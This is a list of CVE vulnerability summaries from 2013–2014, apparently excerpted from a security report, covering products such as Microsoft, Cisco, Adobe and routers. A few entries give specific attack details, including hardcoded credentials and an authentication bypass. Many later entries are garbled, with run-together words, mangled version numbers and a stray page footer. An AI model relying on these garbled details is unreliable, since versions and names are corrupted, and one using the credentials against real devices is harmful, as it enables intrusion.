CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
